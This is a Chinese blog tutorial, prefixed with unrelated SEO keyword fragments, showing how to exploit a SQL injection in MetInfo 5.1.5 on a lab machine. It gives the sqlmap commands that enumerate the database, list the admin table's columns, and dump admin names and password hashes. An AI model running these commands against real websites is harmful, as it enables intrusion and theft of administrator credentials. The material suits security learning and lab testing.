做网站优化两年遇到的SEO常态,百度推广费用怎么算,有哪些网站做的好处,个人网站盈利上次叉叉讲了Sqlmap简单注入(access数据库)教程#xff0c;这次咱说说MySql数据库MetInfo#xff0c;是一款强大的企业网站管理系统#xff0c;采用PHPMysql架构。叉叉下载的是MetInfo 5.1.5的免费版本#xff0c;咱不是大拿#xff0c;不会分析源码#xff0c;直接丢到W…上次叉叉讲了Sqlmap简单注入(access数据库)教程这次咱说说MySql数据库MetInfo是一款强大的企业网站管理系统采用PHPMysql架构。叉叉下载的是MetInfo 5.1.5的免费版本咱不是大拿不会分析源码直接丢到WVS里面扫发现注入点打开我们的backtrack5,运行Sqlmap神器获取当前用户名称,输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id22 –current-user获取当前数据库名称输入命令:python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id22 –current-db得到数据库名为met列数据库表名输入命令python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id22 –tables -D “met“成功得到”met”数据库的表名如下图列admin表的字段输入命令python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id22 –columns -T “met_admin_table“ -D “met”上图显示成功获取met_admin_table表的字段下面dump出admin_name和admin_pass内容输入命令python sqlmap.py -u http://192.168.121.1/MetInfo/about/show.php?id22 –dump -C “admin_pass,admin_name” -T “met_admin_table” -D “met”如您对本文有疑问或者有任何想说的请点击进行留言回复万千网友为您解惑
